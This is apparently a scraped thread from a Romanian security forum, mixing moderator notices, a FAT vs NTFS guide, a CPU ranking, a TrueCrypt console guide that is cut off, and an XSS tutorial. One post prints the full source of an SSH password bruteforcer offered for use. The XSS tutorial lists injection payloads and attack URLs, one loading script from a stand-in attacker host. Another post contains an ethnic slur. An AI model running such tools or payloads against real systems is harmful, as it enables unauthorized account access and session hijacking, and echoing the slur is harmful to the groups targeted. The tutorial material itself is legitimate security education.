Nytro

Nu am nici un psd, nici macar PNG cu scutul, nu am nimic... Cred ca ar fi mai bine unul nou, cred ca ati putea face ceva mai frumos

Cred ca a venit vremea ca headerul forumului sa fie schimbat: 1) Nu mai avem 20k membri 2) E Craciunul 3) Vine noul an, sa ne prinda cu un header nou, de sarbatori Problema e ca noi, cei din staff, ori nu prea ne pricepem ori nu avem timpul si rabdarea necesara pentru a realiza un astfel de header. Asadar, cine ar putea face unul nou? Cine ar putea face unul dragut, deci cineva care se pricepe cat de cat, daca doreste sa faca, sa il posteze aici. Si vom discuta, ce e bine, ce nu e, ce ar trebui schimbat. Vedem noi. Cateva idei: mie imi place ideea de scut, ceva legat de "security" ar fi dragut, poate un shellcode sau un mic cod in limbajul xxx, e Craciunul, deci trebuie neaparat o craciunita, sau doua-trei... Cred ca o sa va descurcati, aveti imaginatie mai multa decat mine. Bafta.

Urat, Craciun "albastru"... Dar imi place scutul de sus.

Maxim 300. Hai, 500 ca e Craciunul. Sa fim realisti.

Da, oameni "patrioti"... Asa sunt 98% dintre romani. Din cauza mentalitatii anti-romaniste e Romania asa.

Basic Guide to FAT vs. NTFS Windows XP offers choices of File Systems... by Tom Bair Besides being the first Micosoft OS (Operating System) to feature an integrated Windows NT and Windows 98 kernel (the core program code of an OS), Windows XP Home Edition is also the first time home users have had the option to use the NTFS (New Technology File System). The File System provides a foundation for storing data on a hard drive. Understanding the strengths and weaknesses of each File System can help you in choosing which one is best for you. What Is A File System? There is more than one way to store information on your hard drive. In addition to NTFS, XP supports the FAT-16 (16-bit File Allocation Table) and the FAT-32 (32-bit File Allocation Table) file systems. Both versions of FAT are simpler and more direct than NTFS but not as reliable or secure. Due to it's reliability and security, NTFS has long been the file system of choice in business environments. With NTFS, system administrators can exercise some control over what users do on a workstation. And when problems occur, NTFS is better able to recover without losing data. FAT has traditionally been the file system of choice for personal or home computers. Yet with the inclusion of NTFS support in Windows XP, significant numbers of home users are making the switch to enjoy the extra security and reliability NTFS provides. File System Compatibility File System compatibility becomes important if you plan to install more than on OS. In order to install more than one OS, you'll need to partition your hard drive. Windows treats each logical partition as a separate drive and each can contain its own File System. In general, systems that can support NTFS also support FAT: Windows NT Windows 2000 Windows XP Home and Pro Older consumer versions of Windows only support FAT: Windows 95 Windows 98 Windows 98 Second Edition Windows ME This means Windows ME installed on a FAT partition can't access data stored in an NTFS partition. XP, on the other hand, can read and write data from both NTFS partitions and FAT partitions. Note that WinNT does have some compatibility problems with newer versions of both FAT and NTFS. Although WinNT supports the older FAT16 file systems, it does not support FAT32. WinNT also has NTFS problems. Unless you have Service Pack 4 installed, you won't be able to read new NTFS 5.0 partitions that Windows 2000 and Windows XP use. Understanding A File System Before we discuss FAT and NTFS in detail, let's cover a few basics for those of us who are less-informed. Both types of file systems divide data into units called clusters. Each cluster can only hold one file, yet one file may span several clusters; but any empty space left in the last cluster remains vacant. Smaller cluster sizes are more efficient from a storage perspective (they make for less leftover space), but they're less efficient in terms of performance. Larger clusters can hold more data, which means less work for the PC and slightly better performance. Cluster size also plays a role in deciding how large a hard drive a system can support. Overall, cluster size increases with available hard drive space. On a newly installed system, related clusters are stored close together. As time passes, however, these clusters can become fragmented and find themselves scattered all over the hard drive. Most versions of Windows include Disk Defragmenter, a utility that examines data in each cluster and reorganizes it so related clusters are placed closer together on the hard drive. Fragmentation is a problem for both FAT and NTFS partitions. ---------------Cluster Chart--------------- Smaller clusters can squeeze more data onto a drive, but larger clusters provide better performance. Generally, 4KB clusters provide a nice balance between performance and storage efficiency. Below are the default cluster sizes for the FAT16, FAT32, and NTFS under Windows XP. Partition Size...........Cluster Size FAT16 16MB - 127MB................2KB 128MB - 255MB..............4KB 256MB - 511MB..............8KB 512MB - 1,023MB...........16KB 1,024MB - 2,048MB........32KB 2,048MB - 4,096MB........64KB FAT32 512MB - 8,191MB..........4KB 8,192MB - 16,383MB.....8KB 16,384MB - 32,767MB...16KB 32,767MB+..................32KB NTFS 0MB - 512MB..............512 bytes 513MB - 1,024MB........1KB 1,025MB - 2,048MB.....2KB 2,049MB+..................4KB Facts On FAT The most basic Windows file system is known as FAT. It gets its name from the file allocation table stored near the beginning of the drive. The FAT keeps track of every file saved on its drive or partition. When you save data or a file to the hard drive, the system consults the FAT to find empty clusters. After it saves the information, it modifies the FAT to reflect the name of the file saved and the clusters it saved the file to. When opening the document, the system searches through the FAT for the file name, finds the associated clusters where the file is stored, and reads the information contained in those clusters. As I stated earlier, there are two primary varieties of FAT. FAT16, or 16-bit FAT, has been around for many years. Then FAT32, or 32-bit FAT replaced FAT16. FAT16. FAT16 is a 16-bit file system because it identifies clusters that are 16 bits (or digits) long. There are quite a few possible combinations with 16 slots to work with, but there is a limit. Because FAT cluster sizes vary depending on how much drive space the system needs to catalog with its range of available names, and because FAT16 can't support as many clusters as FAT32, it needs larger clusters to cover the same amount of space. To format an entire 1BG partition, as example, FAT16 clusters must expand to roughly 32KB, which is too large for efficient storage. XP supports FAT16 clusters up to 64KB in size. Given that FAT16 can only support 65,536 clusters, you can't use FAT16 on a partition larger than 4GB. Of course, 64KB clusters are extremely inefficient. About the only thing using FAT16 today are floppy drives and their 1.44MB disks. FAT32. FAT32 made it's first appearance in Windows 95 OSR2 (Original equipment manufacturer Service Release 2; a version of Windows 95 made available exclusively to manufacturers and never sold at retail). Windows 98 was the first retail version of Windows to include support for FAT32. Because FAT32 is a 32-bit file system, it can address more clusters than FAT16. As a result, FAT32 can use smaller clusters for better storage efficiency. It can also support larger partitions, up to 8TB (terabytes) in size. FAT32 was made compatible (as much as possible) with FAT16, but some changes were made behind the scenes. As a result, some software, such as older drive utilities, will not work on hard drives using FAT32 file systems. Hard drive compression utilities, such as DriveSpace and DriveSpace 3 are incompatible with FAT32. NTFS For several years now NTFS has been well-known for its security and reliability. Windows XP Home Edition marks the first time home users get to use this more robust file system. However, there's more to NTFS than just laying out data on a hard drive. Master File Table If NTFS had anything in common with FAT, it would be the MFT (Master File Table). The MFT is very close to the file allocation table in FAT, only much more complicated. The MFT stores file attributes for every file stored on the NTFS partition. File attributes describe everything there is to know about a file. In NTFS, even the data contained in a file is a file attribute. Additional file attributes include the file's name, location, and security information. When possible, NTFS stores all the file attributes, including the file's data, in the MFT. Often there is not enough room to accommodate all the attributes in the MFT so the data attribute will be moved outside the MFT, and a pointer will direct the system to all the clusters containing the data attribute of the file. The system can then retieve the data. Metadata The MFT is known as a metadata file. Metadata is essentially data about data. NTFS uses metadata files to manage data on the partition . Some of the more important metadata files include the MFT Mirror, Log File, Cluster Allocation Bitmap, Bad Cluster File, and Quota Table. It's pretty easy to figure out that the MFT Mirror is just a backup copy of the MFT. NTFS stores the MFT at the beginning of a hard drive's platter, and places the MFT Mirror in the middle of the platter. If the original MFT becomes damaged, the MFT Mirror will provide the necessary information to recover data on the system. The Log File, also known as the Change Log Journal, records changes made to the file system. The Log File only records actions taken, not data which is modified. In other words, it can tell you when Windows writes a document to the file system but not what data the document contained. The Log File is useful to Anti-Virus programs, Backup utilities, and other applications which have an interest in knowing when changes occur to the file system. The Cluster Allocation Bitmap is a map of the partition. The system uses the information contained in the Cluster Allocation Bitmap to locate available clusters to write new data to. The Bad Cluster File is similar, but it marks sections of the hard drive that have gone bad; and the system will not store data in these marked clusters. The Quota Table is a feature new in Windows 2000 and Windows XP. Using quotas, you are able to control how much hard drive space a directory and its subdirectories (folders and subfolders) can use. It allows you to control how other users on the PC utilize hard drive space. This will allow you to limit just how much storage space your son can consume for his mp3 files, or keep a family member from stocking up three years worth of e-mail messages. Smaller Clusters Since NTFS can support more clusters than FAT32, the result is NTFS clusters are generally smaller and more efficient. XP and 2K have a default cluster size of 4KB. But if you are converting a FAT file system to NTFS, you will have 512-byte clusters. This may cause you to have a slight performance hit. NTFS Security Support for file and directory permissions is one of the major benefits of using NTFS. This security feature insures that only certain users have access to specific files and directories. For example, you can grant Bill complete access to a directory, while preventing Mary from ever seeing its contents. The security for Windows XP Home Edition is a bit different, NTFS only provides what is known as simplified security. Provided you have set up multiple password-protected user accounts, you can mark certain directories as private. Other users won't have access to your private directories. The information about file and directory permissions is stored in the Security Descriptor file attribute. When you try to access a file, XP will look at who is logged on; then compare that information to the information in the Security Descriptor file attribute for the file. If it finds you have permission to access the file, it will look up the location of clusters containing the file and open it for you. If you don't have permission to access the file, XP will let you know. Which File System Is For You? When you install XP, you will have to decide whether to install NTFS or FAT32. FAT32 is most useful on multi-boot machines (PC's with more than one OS installed that let you choose which OS you want each time you boot) when file system compatibility is important. If you use a multi-boot computer and want to keeps things simple, install Windows XP on a FAT32 partition. If you are like me and want to play with NTFS but still need to maintain some file system compatibility, you can install XP on an NTFS partition and create a separate FAT32 partition to use specifically for sharing documents between your multiple Operating Systems. If XP is going to be the only OS on your PC, try using NTFS. In most cases, NTFS will be the most efficient choice and, it offers a range of advanced features which are not present in FAT32. Converting A File System f you have already installed your Windows XP on a FAT16 or FAT32 partition and now want to upgrade to NTFS, the convert.exe utility will let you do just that. To convert a partition: 1. Click on the Start button. 2. Highlight All Programs, Accessories, and click on Command Prompt. 3. Type convert.exe c: /fs:ntfs. This will convert your C drive (replace "c" with the proper drive letter to convert another drive). 4. XP will prompt you to enter a volume name. The name you enter will appear next to the drive in My COmputer. 5. If you specified the partition that has XP installed on it, the utility will ask if you want to convert the next time you boot the system. Click Yes and reboot. The conversion process will create the MFT and other metadata files in free space and won't overwrite any FAT clusters until the NTFS file system is in place. This means if you experience an error during the conversion process, the system should fall back to the FAT file system without losing any data. It also means that you'll need some free space to convert an existing FAT partition. The exact amount of free space required varies according to the size of the partition and the amount of data it contains. Please be aware that converting to NTFS is a one-way trip. Once the conversion is complete, the only way to return to a FAT file system is to reformat the hard drive, thereby destroying any existing data in the process. Author: Tom Bair Source: Security Forums :: View topic - [Tutorial] Basic Guide to FAT vs. NTFS Republished with the permission of the author and Security-Forums Dot Com.

Pentru a mia oara, nu mai postati aici la Offtopic daca topicul se incadreaza in alte categorii ca CERERI sau AJUTOR. Ai o problema, iti trebuie ceva anume? NU postezi aici. Citit asta: http://rstcenter.com/forum/28329-topicurile-de-la-offtopic.rst M-am plictisit sa dau avertismente pentru asta.

Sincer, nu stau sa citesc tot articolul. Pe scurt: MUIE la tigani si la unguri!

Ce rost are sa iti bagi Linux daca vrei sa joci Counter? Il folosesti foarte rar, cand ai stricta nevoie de ceva si nu exista alternativa Linux.

Eu ascult manele. Daca faci o versiune pentru Linux poate o sa o folosesc

E luat de pe Backtrack. #!/usr/bin/python import thread import time from threading import Thread import sys, os,threading, time, traceback, getopt import paramiko import terminal global adx global port adx="1" port=22 data=[] i=[] term = terminal.TerminalController() paramiko.util.log_to_file('demo.log') print "\n*************************************" print "*"+term.RED + "SSH Bruteforcer Ver. 0.2"+term.NORMAL+" *" print "*Coded by Christian Martorella *" print "*Edge-Security Research *" print "*laramies@gmail.com *" print "*************************************\n" def usage(): print "Usage: brutessh.py options \n" print " -h: destination host\n" print " -u: username to force\n" print " -d: password file \n" print " -t: threads (default 12, more could be bad)\n\n" print "Example: brutessh.py -h 192.168.1.55 -u root -d mypasswordlist.txt \n" sys.exit() class force(Thread): def __init__( self, name ): Thread.__init__(self) self.name = name def run(self): global adx if adx == "1": passw=self.name.split("\n")[0] t = paramiko.Transport(hostname) try: t.start_client() except Exception: x = 0 try: t.auth_password(username=username,password=passw) except Exception: x = 0 if t.is_authenticated(): print term.DOWN + term.GREEN + "\nAuth OK ---> Password Found: " + passw + term.DOWN + term.NORMAL t.close() adx = "0" else: print term.BOL + term.UP + term.CLEAR_EOL + passw + term.NORMAL t.close() time.sleep(0) i[0]=i[0]-1 def test_thread(names): i.append(0) j=0 while len(names): try: if i[0]<th: n = names.pop(0) i[0]=i[0]+1 thread=force(n) thread.start() j=j+1 except KeyboardInterrupt: print "Attack suspended by user..\n" sys.exit() thread.join() def test(argv): global th global hostname global username th = 12 if len(sys.argv) < 3: usage() try : opts, args = getopt.getopt(argv,"h:u:d:t:") except getopt.GetoptError: usage() for opt,arg in opts : if opt == '-u': username = arg elif opt == '-h': hostname =arg elif opt == '-d': password = arg elif opt == "-t": th = arg try: f = open(password, "r") except: print "Can't open password file\n" sys.exit() print term.RED + "HOST: " +term.NORMAL + hostname + term.RED + " Username: " +term.NORMAL + username +term.RED + " Password file: " +term.NORMAL+ password print "===========================================================================" print "Trying password...\n" name = f.readlines() starttime = time.clock() test_thread(name) stoptime = time.clock() print "\nTimes -- > Init: "+ str(starttime) + " End: "+str(stoptime) print "\n" if __name__ == "__main__": try: test(sys.argv[1:]) except KeyboardInterrupt: print "Attack suspended by user...\n" sys.exit() Va descurcati. Daca nu sunteti in stare sa il folositi nici pe asta, lasati-va de astfel de prostii. (@ "hackerii de carton")

Ba, nu dai de beut? La multzani. :->

OSSTMM - Open Source Security Testing Methodology Manual The Open Source Security Testing Methodology Manual (OSSTMM) is a peer-reviewed methodology for performing security tests and metrics. The OSSTMM test cases are divided into five channels (sections) which collectively test: information and data controls, personnel security awareness levels, fraud and social engineering control levels, computer and telecommunications networks, wireless devices, mobile devices, physical security access controls, security processes, and physical locations such as buildings, perimeters, and military bases. The OSSTMM focuses on the technical details of exactly which items need to be tested, what to do before, during, and after a security test, and how to measure the results. New tests for international best practices, laws, regulations, and ethical concerns are regularly added and updated. Provided here is the latest public release. To receive OSSTMM development status, notes, and betas, become part of the team. Subscribe now to join the ISECOM Gold or Silver Team or contact us with how you can help OSSTMM development and earn a place on the core development team. Sursa: ISECOM - Making Sense of Security Download: http://www.isecom.org/mirror/OSSTMM.3.pdf

Rugaminte: nu ii mai raspundeti la intrebari lu Krisler12™. Pune cu sutele si degeaba, ca sa se afle si el in treaba.

Programul nu stie sa faca redirect. Redirectul poate fi naspa, de la un simplu header HTTP la un naspet cod JavaScript. Pui link-ul catre care trimite link-ul de adf.ly.

Ban. Cine urmeaza?

Un topic de nota 10. Ban osyk.

Ierarhia CPU-urilor desktop multi core Ati avut nevoie sa va luati un procesor nou, si nu stiati in bugetul vostru care model este mai performant? Ati avut nevoie de un upgrade, dar la cat de des se schimba denumirile in ultimul timp nu ati mai stiut de unde sa incepeti? Acum putem lamuri impreuna situatia, cu ajutorul tabelului de mai jos, ce incearca sa ordoneze descrescator dupa performanta toate procesoarele desktop multi core. El a fost realizat pe baza testelor de la BeHardware, la care s-au adaugat extrapolari personale, experienta proprie, si variate review-uri din imensitatea Internet-ului. Nu am luat in considerare CPU-urile single core, pentru ca acestea sunt depasite in ziua de azi, rare in oferte, si nu ar mai trebui sa mai fie pe lista de cumparaturi a niciunuia dintre noi! Daca am omis vre-un model, sau unele CPU-uri nu sunt corect pozitionate, nu ezitati sa-mi spuneti (argumentat). Totodata, prin includerea a cat mai multor caracteristici, am incercat sa transpun o imagine de ansamblu a intregii lumi a procesoarelor multi core, ce permite o diferentiere cat mai corecta a multiplelor arhitecturi existente. Pretul nu a fost luat in calcul la realizarea acestui top, pentru ca este o caracteristica mult prea volatila pentru a putea fi evaluata in mod constant. Ierarhia o gasiti aici: Ierarhia CPU-urilor desktop multi core | Arena IT

Doar aici pe RST am o parola al dracu de naspa, in rest nu sunt cine stie ce, nu imi pasa daca o ghiceste cineva. Deci nu cred ca are rost sa folosesc parole dinamice sau foarte lungi.

Mie imi place

Deplasarea tuturor bitilor acelui numar scris in hexazecimal cu 2 pozitii catre dreapta. Cu alte cuvinte, acel numar impartit la 4 (2 la puterea 2). Cel putin asa banuiesc, nu stiu despre ce e vorba in acel concurs.

XSS Tutorial - From Bug to Vulnerability First Revision [updated] - 2010 (no actual attack code is provided in this article) ___ -:: Introduction ::- ____________ What is XSS and what does it refer to? XSS aka Cross Site Scripting is a client-side attack where an attacker creates a malicious link, containing script- code which is then executed within the victim's browser. The script-code can be any language supported by the browser but mostly HTML and Javascript is used along with embedded Flash, Java or ActiveX. What can Cross Site Scripting be used for? Cross Site Scripting can be used for a variety of things, such as session-hijacking, browser attacks, phishing, propaganda and even worms! However it still requires the victim to click a malicious link created by the attacker or visit a malicious page that the attacker controls. How could One get a victim to click a XSS-link? The easiest way to get people to click malicious links is to make them look authentic and non- malicious. Giving them a reason afterwards is the social-engineering part which should be easy except if the victim is aware of such attacks and / or has measures against Cross Site Scripting, such as NoScript. How does One avoid XSS-links looking suspicious? This is typically done with encoding, short url services, redirects and even flash! Which types of Cross Site Scripting are there? The most common types are GET- and POST-based XSS. However Cross Site Scripting can also be triggered via cookies. Persistent and non-persistent XSS are defined by wether the script will remain and execute directly on the site (if f.ex. html or sql injection are used) or if the chosen script will have to be called with a malicious url each time it has to be executed. (non-persistent) What is the difference between GET- and POST-XSS? The difference is that when GET-variables is used it is possible to conduct normal XSS attacks where an attacker sends a malicious crafted URL to the victim which is then executed when the victim opens the link in the browser. With POST-variables an attacker could f.ex. use flash to send the victim to the POST-XSS vulnerable site since it is not possible to create an URL when POST-variables are in use. Are there sub-categories of Cross Site Scripting? At the moment there's XSSR and XSSQLI. One could say that XSRF/CSRF belongs to the same category, however the attack method differs too much from traditional Cross Site Scripting. XSSR or CSSR aka Cross Site Script Redirection is used to redirect a victim to another page unwillingly. The page can for example contain a phishing template, browser attack code or in some cases where the data or javascript URI scheme is used: session-hijacking. XSSQLI is a mix of Cross Site Scripting and SQL Injection, where an unknowing victim clicks a malicious link containing SQL Injection instructions for an area in the website which requires privileges that guests or members doesn't have. XSRF or CSRF (sometimes refered to as C-Surf) stands for Cross Site Request Forgery which is used to send input from a 3rd party site to the target site. XSRF can in some cases be triggered just by viewing a specially crafted image but the most commonly used are URLs. With Cross Site Request Forgery it might be possible to f.ex. alter the password of the victim if the target site is not secured properly with tokens etc. What is XST and can it be used for anything? XST also known as Cross Site (Script) Tracing is a way of abusing the HTTP Trace (Debug) protocol. Anything that an attacker sends to a web-server that has TRACE enabled will send the same answer back. If an attacker sends the following: TRACE / HTTP/1.0 Host: target.tld Custom-header: <script>alert(0)</script> Then the attacker will receive the same "Custom-header: <scr..." back allowing script execution. However after recent browser updates the following year(s) XST has been increasingly harder to control and execute properly. How is it possible to find XSS bugs within websites? There are 2 methods: code / script auditing or fuzzing which is described below. What kind of tools is required to find XSS bugs? (REQ = Required, OPT = Optional) - REQ: An Internet Browser (such as FireFox) in case you're fuzzing. - REQ: A text-viewer (such as notepad) in case you're auditing. - OPT: An intercepting proxy in case you're doing more advanced XSS. (In FireFox it is possible to use Tamper Data). - OPT: Browser Addons, for FireFox the following are especially useful: Firebug, JSView and LiveHTTP Headers. What else is useful to know if One wants to find XSS bugs? - Browser limitations regarding Cross Site Scripting [1] - HTTP Headers and how the HTTP protocol works. - HTML + Javascript and perhaps embedded script attacks. (flash etc.) - Intercepting proxies (Burp etc.), differential tools (meld, ExamDiff, etc.) - Useful browser-addons (see FireCat [3]) - Website scanners (Nikto, W3AF, Grendel, Directory-fuzzers etc.) Where are XSS-bugs typically located? It is usually located in user submitted input either via GET or POST variables, where it is reflected on the target site as text outside tags, inside tag values or within javascript. It can also in some cases be submitted via cookies, http headers or in rare cases file uploads. How does One protect a site against XSS? The best way is to ensure that all user input and output is validated properly. However in some cases an IPS or WAF can also protect against XSS though the best way is still to validate the user-input and -output properly. ___ -:: Finding the Bug - With Fuzzing ::- ____________ [EASY] Example Case - A: We're at hxxp://buggysite.tld where we see a "Search-field" in the top-right. Since we don't know the real source code but only the HTML-output of the site we will have to fuzz anything where it is possible to submit data. In some cases the data will be reflected on the site and in some cases it wont. If it doesn't we move on to the next cookie, header, get / post variable or whatever it is that we are fuzzing. The most effective way to fuzz is not to write: <script>alert(0)</script> since many sites has different precautions against Cross Site Scripting. Instead we create a custom string which in most cases wont trigger anything that might alter the output of the site or render error pages that aren't vulnerable. An example of an effective string could be: "keyword'/\>< " ' /\ > and < are the most commonly used html characters used in Cross Site Scripting. However if we want to be really thorough then we could also add )(][}{% to the string that we are using to fuzz the target site. The reason why there's not two of " or ' is because this can trigger a WAF, IPS or whatever precaution the site might have tried to implement against XSS instead of using a secure coding scheme /plan / development cycle. The reason why all characters are written as >< instead of <> is because this is a common bypass against XSS-filters! With that in mind, we use the following string: "haxxor'/\>< to fuzz the search-field: Lets take a look at the returned HTML-code: ... <input type="text" name="search" value=""haxxor'/\><" /> <br /> You searched for \"haxxor\'/\\>< which returned no results. ... As we can see the input tag encoded our fuzzing string correct, however the text afterwards did not encode it properly as it only added slashes which is completely useless against Cross Site Scripting in this case. By submitting the following string we can XSS their website: <script>alert(0)</script> or perhaps <script src=hxxp://h4x0r.tld/xss.js></script> Of course we don't know if the following characters : ( ) and . are filtered but in most cases they work. Our final XSS-url could be: hxxp://buggysite.tld/search.php?query=<script>alert(0)</script> if GET-variables are used. [EASY] Example Case - B: We're at hxxp://yetanothersite.tld where we see another search formular. The following is returned after our string is submitted to the search field: ... <input type="text" name="search" value="\"haxxor\'/\\><" /> <br /> You searched for "haxxor'/\>< which returned no results. ... In this case the string after the tag encoded the string properly, however the string inside the tag only had some slashes added which does nothing in this case. Basically we can bypass this easily with: "><script>alert(0)</script> If we're going to load external javascript we will have to avoid using " and ' of course. Our final XSS-url could be: hxxp://yetanothersite.tld/search.php?query="><script>alert(0)</script> if GET-variables are used. [MODERATE] Example Case - C: We're at hxxp://prettysecure.tld where we find yet another search field, it's time to submit our fuzzing string. The following HTML-code is returned after our string is submitted: ... <input type="text" name="search" value=""haxxor'/\><"> You searched for ""haxxor'/\><" which returned no results. ... (further down) <script> ... s.prop1="prettysecure"; s.prop2="\"haxxor%39/\%3E%3C"; s.prop3="adspace"; ... </script> For most people this might look secure but it really isn't. A lot of people also overlooks potential Cross Site Scripting vectors if their string <script>alert(0)</script> is either not output directly or encoded where they expect the XSS bug to be. This is why it is important to use a keyword that doesn't exist on the site, such as haxxor or something better. The reason why a keyword is used is because it is searchable almost always, you can call it a XSS-locator. [1] Anyway, back to our example. s.prop2="\"haxxor%39/\%3E%3C"; looks secure but the flaw is that backspace aka \ is not filtered or encoded correct. So if we write: \" it will become \\", which will escape the first \ but not our quote. As you can see, we can't use tags either so we'll have to do something else. We have of course checked that brackets ( ) are NOT filtered. (in some cases they can be). By entering the following string we are able to create an alert box: \"; alert(0); s.prop500=\" This will become: s.prop2=\\"; alert(0); s.prop500=\\" when we submit the string. The reason why we add the s.prop500=\" variable to our string is because the javascript will most likely NOT execute if we don't. We could also use comments so instead of s.prop500=\" we just use // in the end of the string. In this case it is also possible to execute external javascript if One uses a bit more advanced javascript. In order to do this we can use document.write(String.fromCharCode()); where you will need a decimal converter. Our final XSS-url could be: hxxp://prettysecure.tld/search.php?query=\"; alert(0); s.prop500=\" ___ -:: Finding the Bug - With Auditing ::- ____________ [EASY] Example Case - A: The following file (index.php) has some interesting code: ... if($_GET['view_profile']==1) { echo $_GET['name']; ... (more code) } ... By looking at the above code we can see that if view_profile is equal to 1 then the script prints the "name" variable. An example attack URL could look like: hxxp://testz.tld/index.php?view_profile=1&name=<script>alert(0)</script> [HARD] Example Case - B: The following file (search.php) has some interesting code: ... if($_GET['set_flag']==1) { $var = "checked"; } echo "<input type='radio' value='flag' checked='" .htmlentities($var). "' />"; ... This is a conditional vulnerability where register_globals in php.ini has to be set to On. (Off is factory default). Register_Globals basically allows an individual to set variables on the fly, even if they are not meant to be set. This only applies to variables that are NOT set as in the example above. Another problem we have encountered is htmlentities however due to a coding error we can still abuse the tag without creating a new. We will need to use event handlers in the <input> tag and some CSS (Cascading Style Sheet) to make sure that the victim triggers the eventhandler no matter what. There's multiple ways of doing that, one of them is: style='display:block;width:99999px;height:99999px;' An eventhandler that we could use in this case could be onmouseover, even though onblur might be better. You might ask yourself, why is the above script not secure? Because htmlentities() used that way is insecure, due to that the tag looks like this in html form: <input type='radio' value='flag' checked='$var' /> Inside the checked value our variable ($var) is encoded, but only " > and < are encoded, not ' due to ENT_QUOTES were not set in the htmlentities function. This means that we can break out of checked='' easily. An example attack URL could be: hxxp://was-secure.tld/search.php?test=' style='display:block;width:99999px;height:99999px; ' onmouseover='alert(0) There is no "Example Case - C" since I have gone through most the important of Cross Site Scripting. ___ -:: Additional Information ::- ____________ XSSR When it is possible to send a user to the data or javascript URI scheme either via A) GET- or POST-variables or User submitted content such as a link then the XSSR category applies to the bug. However some individuals has claimed that a site that only accepts HTTP or HTTPS links via GET-variables also falls under the XSSR category. An example of XSSR could be: hxxp://somesite.tld/redirect.php?link=data:text/html,<script>alert(0)</script> And if the Javascript URI scheme is used: hxxp://somesite.tld/redirect.php?link=java script:alert(0); This has in some cases been known to leak cookies and is therefore used in session-hijacking. XSSQLI When a SQL Injection vulnerability exists within a privileged area of the target site, XSSQLI becomes usable. An example of XSSQLI could be tricking the administrator of "shouldbescure.tld" to click either the SQL Injection link or click a Cross Site Scripting link which contains a call to the SQL Injection in the privileged area of the site where this could be the vulnerable part: hxxp://shouldbesecure.tld/admin.php?del=1 AND 1=1/* XSRF Also known as CSRF and C-Surf can be used against sites that doesn't use tokens which are usually hidden inside tags. A common way to use tokens against C-Surf attacks is to hide them inside tags like: <input type="hidden" name="anti-csrf" value="random token value" /> If the tokens are not random enough it might be possible to calculate these and still use C-Surf in an attack. All of the best, MaXe - Founder of InterN0T References: [1] XSS (Cross Site Scripting) Cheat Sheet [2] http://en.wikipedia....-site_scripting [3] FireCAT 1.5 : Firefox Catalog of Auditing exTensions Sursa: XSS Tutorial - From Bug to Vulnerability - r00tsecurity

Truecrypt's Guide Contents * Introduction * What's Truecrypt and what are its advantages * Things to know before to try * Using truecrypt * Common Problems * Conclusion Introduction This is just a little guide about using truecrypt, I'm writing it because this great tool have been mentioned several times in r00tsec but there's no guide to use it yet. Many sites don't have a truecrypt guide because it use is fairly easy, however, every guide (including the Official Beginner's Manual) is about truecrypt's GUI which work in the interactive mode, this is why this guide is about using truecrypt from the console and will be a Linux based guide. If you're like me, then you'll find every possible time to use some console command instead of using a GUI, so for you is this guide. Isn't perfect, isn't the greatest, but I'll do my best to cover the things that create more confusion about the tool, also, will be (or try to) easy to follow for those who are using the tool for the first time and those who already know the tool. For convenience, I will be using several concepts to define different things, by "virtual volumes" I'll be meaning every group of clusters (random space in a hardrive or a hardrive partition), by "real volumes" I'll be meaning hardrives or partitions and by "removable volumes" I'll be referring to every removable device (like usb hardrives). What's Truecrypt and what are its advantages Truecrypt its an opensource tool build with privacy on mind. Its also referred as hard-disk encryption software, as of today, portable in most of the mayor systems. It works by encrypting the data 'on-the-fly', this means that, if I open a music file that is saved on a encrypted volume, this file will be decrypted in the RAM memory system while the data is asked by the music player, when saving the data, all the encrypting is done in the RAM as well while truecrypt reads the file(s) that are being saved in the volume. From paranoids to companies, this is the best tool to use when you want to keep your information private for peeking eyes. If you're looking for a solution to keep your things private this tool will be your best friend for sure! Truecrypt is loved by many because it has many important features and this is a list of them: * Portable: Can be used in several of the mayor operating systems around, Windows, Linux and Mac OSX. * Volume scope: You can encrypt just a portion of disk or disk partition by creating a virtual volume, you can encrypt a partition or hardrive entirely and you can encrypt removable devices. * Several algorithms: At the time of this writing, Truecrypt support three encryption algorithms, AES, Twofish and Serpent. * Cascades: Related with the avobe, one of the best things to enforce security is that you can use two or three algorithms at the same time, this is what is called cascades which are: AES-Twofish, AES-Twofish-Serpent, Serpent-AES, Serpent-Twofish-AES and Twofish-Serpent. * Several hashes: Besides algorithms, truecrypt uses hashes to create random values from password and key files, at the time of this writing there are only three hashes available, SHA-1, RIPEMD-160 and Whirlpool. * Passwords and key files: Truecrypt is flexible in the way that you can use only passwords to protect the encrypted volume or you can use passwords and key files. The key files are used as random data that is sourced and implemented while creating the hashes, the great thing is that any kind of file and even entire directories can be used as key file, meaing that you can use a mp3 file or a video avi file as key file. * Interfaces: The tool can be used through a GUI (Graphical User Interface) or from the console which offer wider portability. * Interactive use: For those who are starting to use the tool, this is the best. The interactive mode is used by truecrypt when there are no parameters passed to the initial command, this means that truecrypt will ask the user for every piece of information neede in order to create an encrypted volume thus avoiding errors that can be created by new users. * Two kind of volumes: There are normal volumes and hidden volumes. At the beginning, every volume is a normal one, hidden volumes are created inside of normal volumes as a way to improve the privacy of the data. * Plausible deniability: Related to the previous, this is by far one of the greatest advantage of this tool. Basically, since every truecrypt volume, unless decrypted, is showing as random data, it's almost impossible to know that such truecrypt volume exists, besides that, if the normal volume is expose (someone forces to give the access password), it's impossible to know that there's a hidden volume in it thus the information saved in that hidden volume. You can deny that there are alot of advantages in the tool, and the best of all, is free Things to know before to try When it comes to Linux systems, you need to have specifics kernel support in order "to use" truecrypt volumes, not to create them, just to use them. Also, the specific support you'll need depends on truecrypt's version you're using. Right now there are two mayor versions of the tool being used, the 4.3a and the 5.1a, this two have at least one very important difference regarding to linux support, the 4.3a uses device mapper while the 5.1a use FUSE (Userspace driver). Also, no matter what version of truecrypt you are using, you need to have the loop device support in the kernel. So the first thing you'll need to check before start using truecrypt is that you have kernel support (activate them as modules or built-in accordingly to the truecrypt version you use): Device Drivers --> Multiple devices drivers support (RAID and LVM) --> Device mapper support File systems --> Filesystem in Userspace support Device Drivers --> Block Devices --> Loopback device support Using truecrypt If you're starting to use this tool you need to understand at least how to encrypt what you need to encrypt, and to this, you need to understand that there are different scopes and kinds of volumes. Virtual volumes: Lets say you have a linux partition in /dev/sda4 and this partition have 20GB of space. Now, virtual volumes are just a portion that can be reserved from a partition (or a hardrive if don't have any partitions), basically, is just a file with a fixed lenght that you create on a partition or hardrive. In /dev/sda4 a virtual volume could be one single file called private and be about 5GB of space, in turns, you have /dev/sda4 as a partition of 20GB with a file of 5GB. I call them virtual volumes because every truecrypt volume needs to be mounted and worked as if it was a single disk, so, even when it's actually just a file, it needs to be treated as if it was a real disk on your system. Real volumes: Remember, as I said in the introduction, I'm using this terms as convenience so you can easily understand the way it all works, in the case of real volumes, I mean every partition or entire hardrive that's going 